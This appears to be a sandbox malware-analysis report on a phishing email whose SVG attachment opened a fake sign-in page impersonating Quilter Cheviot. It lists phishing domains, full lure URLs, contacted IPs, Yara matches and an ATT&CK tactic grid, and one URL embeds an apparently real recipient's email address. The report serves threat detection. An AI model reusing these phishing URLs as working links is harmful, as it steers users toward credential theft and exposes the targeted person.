                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49983 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49991 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49989 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49988 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:50031 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.18:50046 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.18:50048 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.18:50049 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.18:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50051 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.112:443 -> 192.168.2.18:50054 version: TLS 1.2
                Source: classification engineClassification label: mal100.phis.evad.winEML@25/36@46/110
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250318T1122140619-2468.etl
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7DF7246-10A0-4098-9443-EDC4BD1936C6" "66FD239E-9DE5-46C9-9CD3-55A0C6CBD113" "2468" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7DF7246-10A0-4098-9443-EDC4BD1936C6" "66FD239E-9DE5-46C9-9CD3-55A0C6CBD113" "2468" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\9114950926.svg
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,10470063623338701964,3264311356742323731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\9114950926.svg
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,10470063623338701964,3264311356742323731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 1.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 2.12..script.csv, type: HTML
                Source: Yara matchFile source: 2.13..script.csv, type: HTML
                Source: Yara matchFile source: 2.3.pages.csv, type: HTML
                Source: Yara matchFile source: 2.4.pages.csv, type: HTML
                Source: Yara matchFile source: 2.5.pages.csv, type: HTML
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation31
                Browser Extensions
                1
                Process Injection
                1
                Masquerading
                OS Credential Dumping1
                Process Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting
                1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop ProtocolData from Removable Media3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading
                Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager12
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://quiltercheviot.uuvght.ru/nTJ777/0%Avira URL Cloudsafe
                https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuBtzVkjUWPyAfYsoLARTnALcLCFnUCNW3DjobhQoJgtJFVwG9u3yxgKVJMxgGbRx2il5WBIbQaIcwT3MQa1jsOGLaAtedE1h9IThKR1LyVBhvwGIHHPsd60cpE2A5rtuhv6I2WjwtnliaqoT9XvtUNVLGJLs5tZQLcBfyptubL9vuVj1dixwg/dOGmOwe0jJcVHNyok9MfrN8x9KudV9hVKZoxRp1y2BOwFcLtHoWhYg7sREANrsfv3A5AfpiuKKaytzguSjLIsQ5RSezJDRkc6zjndnbLTWsxuI8keuUDUfnjzGiSaqgraw5zZ8KKB2TN4ykt2uTP8cCO2lsCahG3cVrtiyW29K12PSaLO0lWjUIFTWblxnTfKoo78ZNc/richard.thorn@quiltercheviot.com0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/tdl2unv9gDV7gebvSTx8fq6Qo8kD8UATTsu0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/rq6hFLBxsRd99C5DxuUMgquYKDtkJqNXasAmjDrY34q9gy0%Avira URL Cloudsafe
                https://v36ix.szsnqp.ru/tarboz@u106ot90%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/favicon.ico0%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=6367236304889408250%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV341300%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/st1Db2ykjfYABIo1c7bMik440A2uivFvcyDDUDxbbHMMLX5lpn867VGTAn6EJhdvlX8cZHuBdooVGYagJwegh2600%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP451400%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab1710%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr671070%Avira URL Cloudsafe
                https://fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es/EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVSrsX08fBse3YeORZdUCL12OblSuv310%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/kljLcPWShXHXVYYUU12tSUDv56HXYBL0GF0xXh47yqPLMdA7Eah01QPwx2200%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB561690%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/klet11CCZk79YbQutqnTSKM1JZecexnomL2CqqrpyZHGyJ74c2fkogJFPjUKjFZ1HDbo2ab2240%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/qrNROqivBHGeLbBOhClY7GZWtq7YPg4tOUKDNS8VcsMyYNAuvDqOSMcRbEguUbLoPuu0pdeAHcd2400%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/xhSSG433q0vLfXw282T0j4tZVT2ieEywR92lVD7p2BPMjtlA0PeiEbuzk0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/efxsGgZ9g96NYVuIvRwEYQSx0A8SVy5blklUrKSSj9iyc6co8Jt781460%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/xyrN6azxUjCRpqSzcd260%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/rshshJxZMD4moUnXROrGzvb6fdlKwG3xxgQnZl0THijFV3HtosSsaMM0Gw6eHHMCef1920%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/ghiYmnsgxfRBtGaEoscjiskLiru2jTJXevHbPWHxkFklSwGnOZswRieoV0kMZoDk6v122100%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=6367235678360612410%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
                https://quiltercheviot.uuvght.ru/56ybfCjabGpJyUZ89160%Avira URL Cloudsafe
                https://fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es/EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVS12TNTVFKSUWpd78P86Oqr500%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  e329293.dscd.akamaiedge.net
                  95.101.182.112
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.3.189
                    truefalse
                      high
                      github.com
                      140.82.121.4
                      truefalse
                        high
                        s-0005.dual-s-dc-msedge.net
                        52.123.131.14
                        truefalse
                          high
                          code.jquery.com
                          151.101.194.137
                          truefalse
                            high
                            cdnjs.cloudflare.com
                            104.17.24.14
                            truefalse
                              high
                              fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es
                              104.21.32.1
                              truefalse
                                unknown
                                challenges.cloudflare.com
                                104.18.94.41
                                truefalse
                                  high
                                  get.geojs.io
                                  104.26.1.100
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.184.228
                                    truefalse
                                      high
                                      v36ix.szsnqp.ru
                                      188.114.97.3
                                      truefalse
                                        unknown
                                        y13tzxbjz1.moydow.de
                                        172.67.200.219
                                        truetrue
                                          unknown
                                          d19d360lklgih4.cloudfront.net
                                          13.33.187.14
                                          truefalse
                                            high
                                            quiltercheviot.uuvght.ru
                                            188.114.97.3
                                            truetrue
                                              unknown
                                              objects.githubusercontent.com
                                              185.199.109.133
                                              truefalse
                                                high
                                                aadcdn.msauthimages.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  ok4static.oktacdn.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://quiltercheviot.uuvght.ru/tdl2unv9gDV7gebvSTx8fq6Qo8kD8UATTsutrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                      high
                                                      https://quiltercheviot.uuvght.ru/nTJ777/#Krichard.thorn%40quiltercheviot.comtrue
                                                        unknown
                                                        https://aadcdn.msauthimages.net/c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                          high
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                            high
                                                            https://v36ix.szsnqp.ru/tarboz@u106ot9false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://quiltercheviot.uuvght.ru/GDSherpa-bold.woff2true
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                              high
                                                              https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWtrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab171true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/34ffrvM4h24NzkkyD6SwzVMu9WijuexAcp9VzMOlBVr67107true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/st1Db2ykjfYABIo1c7bMik440A2uivFvcyDDUDxbbHMMLX5lpn867VGTAn6EJhdvlX8cZHuBdooVGYagJwegh260true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es/EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVSrsX08fBse3YeORZdUCL12OblSuv31false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://quiltercheviot.uuvght.ru/nTJ777/true
                                                              • Avira URL Cloud: safe
                                                              unknown
